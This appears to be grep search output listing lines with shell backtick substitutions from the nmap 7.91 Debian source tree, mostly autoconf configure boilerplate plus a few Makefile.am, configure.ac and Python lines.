nmap-7.91+dfsg1/configure:1900:  as_decl_name=`echo $2|sed 's/ *(.*//'`
nmap-7.91+dfsg1/configure:1901:  as_decl_use=`echo $2|sed -e 's/(/((/' -e 's/)/) 0&/' -e 's/,/) 0& (/g'`
nmap-7.91+dfsg1/configure-1902-  { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $as_decl_name is declared" >&5
##############################################
nmap-7.91+dfsg1/configure-2080-    *\'*)
nmap-7.91+dfsg1/configure:2081:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/configure-2082-    esac
##############################################
nmap-7.91+dfsg1/configure-2163-      case $ac_val in
nmap-7.91+dfsg1/configure:2164:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/configure-2165-      esac
##############################################
nmap-7.91+dfsg1/configure-2178-	case $ac_val in
nmap-7.91+dfsg1/configure:2179:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/configure-2180-	esac
##############################################
nmap-7.91+dfsg1/configure-2298-    set,)
nmap-7.91+dfsg1/configure:2299:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/configure:2300:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/configure-2301-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/configure-2309-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/configure:2310:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/configure:2311:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/configure-2312-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/configure-2329-    case $ac_new_val in
nmap-7.91+dfsg1/configure:2330:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/configure-2331-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/configure-2405-if test "${top_nmap_srcdir+set}" != set; then
nmap-7.91+dfsg1/configure:2406:  top_nmap_srcdir=`cd "$srcdir" && pwd`
nmap-7.91+dfsg1/configure-2407-  export top_nmap_srcdir
##############################################
nmap-7.91+dfsg1/configure-2464-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/configure:2465:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/configure-2466-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/configure-2467-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/configure:2468:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/configure-2469-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/configure-2488-IFS=$ac_save_IFS
nmap-7.91+dfsg1/configure:2489:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/configure-2490-
##############################################
nmap-7.91+dfsg1/configure-2499-else
nmap-7.91+dfsg1/configure:2500:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/configure-2501-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/configure-2521-IFS=$ac_save_IFS
nmap-7.91+dfsg1/configure:2522:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/configure-2523-
##############################################
nmap-7.91+dfsg1/configure-2870-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/configure:2871:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/configure-2872-
##############################################
nmap-7.91+dfsg1/configure-2914-	then :; else
nmap-7.91+dfsg1/configure:2915:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/configure-2916-	fi
##############################################
nmap-7.91+dfsg1/configure-2974-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/configure:2975:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/configure-2976-	  break;;
##############################################
nmap-7.91+dfsg1/configure-3083-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/configure:3084:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/configure-3085-       break;;
##############################################
nmap-7.91+dfsg1/configure-5055-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/configure:5056:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/configure-5057-*GNU*)
##############################################
nmap-7.91+dfsg1/configure-5121-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/configure:5122:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/configure-5123-*GNU*)
##############################################
nmap-7.91+dfsg1/configure-5282-do :
nmap-7.91+dfsg1/configure:5283:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/configure-5284-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/configure-5287-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/configure:5288:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/configure-5289-_ACEOF
##############################################
nmap-7.91+dfsg1/configure-5297-do :
nmap-7.91+dfsg1/configure:5298:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/configure-5299-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/configure-5301-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/configure:5302:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/configure-5303-_ACEOF
##############################################
nmap-7.91+dfsg1/configure-5614-else
nmap-7.91+dfsg1/configure:5615:  am_cv_python_version=`$PYTHON -c "import sys; sys.stdout.write(sys.version[:3])"`
nmap-7.91+dfsg1/configure-5616-fi
##############################################
nmap-7.91+dfsg1/configure-5633-else
nmap-7.91+dfsg1/configure:5634:  am_cv_python_platform=`$PYTHON -c "import sys; sys.stdout.write(sys.platform)"`
nmap-7.91+dfsg1/configure-5635-fi
##############################################
nmap-7.91+dfsg1/configure-5682-     $am_py_prefix*)
nmap-7.91+dfsg1/configure:5683:       am__strip_prefix=`echo "$am_py_prefix" | sed 's|.|.|g'`
nmap-7.91+dfsg1/configure:5684:       am_cv_python_pythondir=`echo "$am_cv_python_pythondir" | sed "s,^$am__strip_prefix,$PYTHON_PREFIX,"`
nmap-7.91+dfsg1/configure-5685-       ;;
##############################################
nmap-7.91+dfsg1/configure-5726-     $am_py_exec_prefix*)
nmap-7.91+dfsg1/configure:5727:       am__strip_prefix=`echo "$am_py_exec_prefix" | sed 's|.|.|g'`
nmap-7.91+dfsg1/configure:5728:       am_cv_python_pyexecdir=`echo "$am_cv_python_pyexecdir" | sed "s,^$am__strip_prefix,$PYTHON_EXEC_PREFIX,"`
nmap-7.91+dfsg1/configure-5729-       ;;
##############################################
nmap-7.91+dfsg1/configure-6239-do :
nmap-7.91+dfsg1/configure:6240:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/configure-6241-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/configure-6243-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/configure:6244:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/configure-6245-_ACEOF
##############################################
nmap-7.91+dfsg1/configure-7076-do :
nmap-7.91+dfsg1/configure:7077:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/configure-7078-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/configure-7080-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/configure:7081:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/configure-7082-_ACEOF
##############################################
nmap-7.91+dfsg1/configure-8004-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/configure:8005:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/configure-8006-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/configure-8072-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/configure:8073:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/configure-8074-  as_echo='print -r --'
nmap-7.91+dfsg1/configure-8075-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/configure:8076:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/configure-8077-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/configure-8079-else
nmap-7.91+dfsg1/configure:8080:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/configure-8081-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/configure-8089-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/configure:8090:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/configure-8091-      esac;
##############################################
nmap-7.91+dfsg1/configure-8166-# ----------------------------------------
nmap-7.91+dfsg1/configure:8167:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/configure-8168-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/configure-8238-  {
nmap-7.91+dfsg1/configure:8239:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/configure-8240-  }
##############################################
nmap-7.91+dfsg1/configure-8342-      case $as_dir in #(
nmap-7.91+dfsg1/configure:8343:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/configure-8344-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/configure-8473-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/configure:8474:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/configure-8475-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/configure-8497-  --*=?*)
nmap-7.91+dfsg1/configure:8498:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/configure:8499:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/configure-8500-    ac_shift=:
##############################################
nmap-7.91+dfsg1/configure-8502-  --*=)
nmap-7.91+dfsg1/configure:8503:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/configure-8504-    ac_optarg=
##############################################
nmap-7.91+dfsg1/configure-8526-    case $ac_optarg in
nmap-7.91+dfsg1/configure:8527:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/configure-8528-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/configure-8534-    case $ac_optarg in
nmap-7.91+dfsg1/configure:8535:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/configure-8536-    esac
##############################################
nmap-7.91+dfsg1/configure-8656-fi
nmap-7.91+dfsg1/configure:8657:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/configure-8658-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/configure-8673-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/configure:8674:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/configure-8675-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/configure-8679-
nmap-7.91+dfsg1/configure:8680:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/configure-8681-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/configure-8817-for ac_last_try in false false :; do
nmap-7.91+dfsg1/configure:8818:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/configure-8819-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/configure-8949-      esac
nmap-7.91+dfsg1/configure:8950:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/configure-8951-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/configure-9008-*)
nmap-7.91+dfsg1/configure:9009:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/configure-9010-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/configure:9011:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/configure-9012-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/configure-9064-/@mandir@/p'
nmap-7.91+dfsg1/configure:9065:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/configure-9066-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/configure-9081-
nmap-7.91+dfsg1/configure:9082:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/configure-9083-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/configure-9108-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/configure:9109:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/configure-9110-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/configure-9222-      case $ac_arg in
nmap-7.91+dfsg1/configure:9223:      *\'*) ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/configure-9224-      esac
##############################################
nmap-7.91+dfsg1/configure-9232-  case $ac_arg in
nmap-7.91+dfsg1/configure:9233:  *\'*) ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/configure-9234-  esac
##############################################
nmap-7.91+dfsg1/configure-9261-*)
nmap-7.91+dfsg1/configure:9262:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/configure-9263-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/configure:9264:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/configure-9265-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/.pc/0003-Link-against-lua-lpeg.patch/configure.ac-40-if test "${top_nmap_srcdir+set}" != set; then
nmap-7.91+dfsg1/.pc/0003-Link-against-lua-lpeg.patch/configure.ac:41:  top_nmap_srcdir=`cd "$srcdir" && pwd`
nmap-7.91+dfsg1/.pc/0003-Link-against-lua-lpeg.patch/configure.ac-42-  export top_nmap_srcdir
##############################################
nmap-7.91+dfsg1/.pc/0004-Python3-port-of-ndiff.patch/ndiff/test-scans/anonymize.py-84-
nmap-7.91+dfsg1/.pc/0004-Python3-port-of-ndiff.patch/ndiff/test-scans/anonymize.py:85:def repl_addr(match):
nmap-7.91+dfsg1/.pc/0004-Python3-port-of-ndiff.patch/ndiff/test-scans/anonymize.py-86-    addr = match.group(0)
##############################################
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-59-	find $(distdir) -name "*.dist" -exec rm {} \;
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am:60:	(distit=`find $(srcdir) -name "*.dist"`; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-61-	for file in $$distit; do \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am:62:	  strip=`echo $$file | sed -e s/^$(srcdir)// -e s/\.dist//`; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-63-	  cp $$file $(distdir)$$strip; \
##############################################
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-105-	win32_srcs='$(WIN32SOURCES)'; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am:106:	sorted_srcs=`for file in $$win32_srcs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-107-	for file in $$sorted_srcs; do \
##############################################
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-117-	win32_hdrs='$(WIN32HEADERS)'; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am:118:	sorted_hdrs=`for file in $$win32_hdrs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-119-	for file in $$sorted_hdrs; do \
##############################################
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-137-	win32_srcs='$(WIN32SOURCES)'; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am:138:	sorted_srcs=`for file in $$win32_srcs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-139-	for file in $$sorted_srcs; do \
##############################################
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-143-	win32_hdrs='$(WIN32HEADERS)'; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am:144:	sorted_hdrs=`for file in $$win32_hdrs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/.pc/Fix-libssh2-Makefile.am.patch/libssh2/Makefile.am-145-	for file in $$sorted_hdrs; do \
##############################################
nmap-7.91+dfsg1/configure.ac-40-if test "${top_nmap_srcdir+set}" != set; then
nmap-7.91+dfsg1/configure.ac:41:  top_nmap_srcdir=`cd "$srcdir" && pwd`
nmap-7.91+dfsg1/configure.ac-42-  export top_nmap_srcdir